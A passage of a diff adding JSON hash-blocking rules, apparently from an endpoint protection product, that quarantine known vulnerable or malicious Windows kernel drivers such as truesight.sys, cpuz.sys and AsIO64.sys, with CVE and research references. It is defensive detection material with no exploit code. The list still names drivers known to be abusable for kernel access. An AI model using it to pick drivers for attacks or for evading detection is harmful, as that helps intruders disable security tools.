+ "comment": "Malicious Kernel Driver (aka wfshbr64.sys) [CVE-2022-42046] [https://github.com/kkent030315/CVE-2022-42046] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c559153d-1f34-50fe-aa02-a6b6f5e650ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490437Z",
+ "creation_date": "2026-03-23T11:45:31.490439Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490444Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d48cf5f3deb5404e2020f2bf68c4c7f36b183b0c0fdcbb4e99bfef9d10ce51d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c56cc959-3c0f-506e-b50d-3b0dc0f19bb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826729Z",
+ "creation_date": "2026-03-23T11:45:31.826731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4215f0b6a23010731723be817cbd4258377f183b4253496917013cb471b9099a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5742ce7-6f64-5aaf-981c-a159b91a1545",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812857Z",
+ "creation_date": "2026-03-23T11:45:31.812859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97a1b74fb41d4ef4838b85283f096151fc675edaa5e2190200f17c25583162d8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c57741f6-fc0c-5d7f-af50-04d454d2b358",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150789Z",
+ "creation_date": "2026-03-23T11:45:31.150791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "202a6dfbf79ffe81b5c6528989eb2e1654a396dbbbaa5c7579e0e93c64869e16",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c57bd092-c111-5a12-898e-c0cc62bc2c8d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472409Z",
+ "creation_date": "2026-03-23T11:45:31.472412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1332d398824663df3b9bef3bb5f26fbeac2883c49b2ca832a9c4db4c572eabc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c57ca051-ec3c-5e24-8488-399c1c32691f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461526Z",
+ "creation_date": "2026-03-23T11:45:30.461529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461538Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7113dee11925b346192f6ee5441974db7d1fe9b5be1497a6b295c06930fdd264",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c584c05e-bbd7-5c27-81dc-36e60fd669bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492268Z",
+ "creation_date": "2026-03-23T11:45:31.492270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492275Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0386ed36fdd44d7645fe5ef420d885a2a1e74cb77074274734cd36dd3fbb10f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5882499-3776-58db-8c3f-b7d80449e972",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473779Z",
+ "creation_date": "2026-03-23T11:45:30.473785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cad825ef477bdbafda6be0bbe9149d915560077d9017655fdb7f2233da9ad01",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c599e9d4-4ff6-5842-aa0a-8fc6d5e8e57e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143042Z",
+ "creation_date": "2026-03-23T11:45:32.143044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c6a4d07e95ab4212c2afefcb0ce37dc485fa56120b0419b636bd8bd326038c1",
+ "comment": "Vulnerable Kernel Driver (aka msr.sys) [https://www.loldrivers.io/drivers/ee6fa2de-d388-416c-862d-24385c152fad/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5a40e4b-69e6-52f6-b7c3-75af42a9a819",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835825Z",
+ "creation_date": "2026-03-23T11:45:30.835826Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49a0e50f8d434282b7393389a08e55aa430c2bfadfaafc5d747fcadcdb9869ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5ad0236-4dc3-5056-96a5-e3af9336e172",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982177Z",
+ "creation_date": "2026-03-23T11:45:29.982180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982188Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a3090ae46b3ce5f4cc6ba2d4dd265033e23c813d5c1e9c7a20a84d5d167dae3",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5ae0724-cdd1-5570-997e-c7645c559254",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455108Z",
+ "creation_date": "2026-03-23T11:45:30.455111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93d99a5fbfc888c0a40a18946933121ae110229dcf206b4d17116a57e7cf4dc9",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5b47207-b5ce-53b8-9df8-e0571a109f3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816062Z",
+ "creation_date": "2026-03-23T11:45:30.816064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816070Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5cbe195ef5e86f705c8290602ae688e1835e7385ed68ae264c4795e425c1645f",
+ "comment": "Vulnerable Kernel Driver (aka ecsiodriverx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5c497cb-b547-5844-961c-6893f2428abf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490574Z",
+ "creation_date": "2026-03-23T11:45:31.490576Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea66dc3a26e2e6a325f2e738cf22fbb90069d30ee2d678abe9ce89ede145834e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5ce6fab-58a5-5a25-97d9-03cf56029eed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606226Z",
+ "creation_date": "2026-03-23T11:45:29.606228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74",
+ "comment": "Vulnerable Kernel Driver (aka PanIOx64.sys) [https://www.loldrivers.io/drivers/93c84c08-4683-493d-abf7-22dc2d1cb567/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5d3ef2a-d9f6-510f-9847-e89d3e98b3e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814066Z",
+ "creation_date": "2026-03-23T11:45:31.814069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89f59c4e933d8d39133a7c6505b28c774f72a92234d4a4228f17834dc7389307",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5d40ff1-8f13-5354-a023-926a43dc0fa4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621350Z",
+ "creation_date": "2026-03-23T11:45:29.621352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621358Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "906d8412b357379db9512e3f584fcda1f788acc1337e5b4d4eff5e6fa59324a6",
+ "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5eff58b-3ced-524d-b433-4e1046cbe0fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832764Z",
+ "creation_date": "2026-03-23T11:45:30.832766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "286a58f44c92c7d30f0aa61c959889a439e93cbc487f447306be06b20825b7c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c612c7df-d9f9-5551-8eb7-3ff8eb679766",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618133Z",
+ "creation_date": "2026-03-23T11:45:29.618135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79aa2cedd1b8415ba6d00f4b3601e2363c8bdd07f860a3b8de010f9e5187c0e9",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c61ef844-42bf-569f-b0be-ee208967a37e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156860Z",
+ "creation_date": "2026-03-23T11:45:31.156862Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156867Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d6c2b4360c50e865572f736c262601b8ae92ebea8c2d4428dc6dddefa2a570d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c62259cb-056a-530e-a73a-e56fb274c675",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820408Z",
+ "creation_date": "2026-03-23T11:45:31.820411Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfb9e69e73e12b098be099971e13f41d5b1de3509c0b3578a1192f6cd28d73fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6230b77-721b-530b-b10c-1ffdb6ce1ce1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978493Z",
+ "creation_date": "2026-03-23T11:45:29.978495Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ce44d1643bc4d87e5029a4927613035bbd96b4e45a2400aed987396115791f7",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c62b1b04-67f9-5b6a-9cc4-58bbee85d03a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
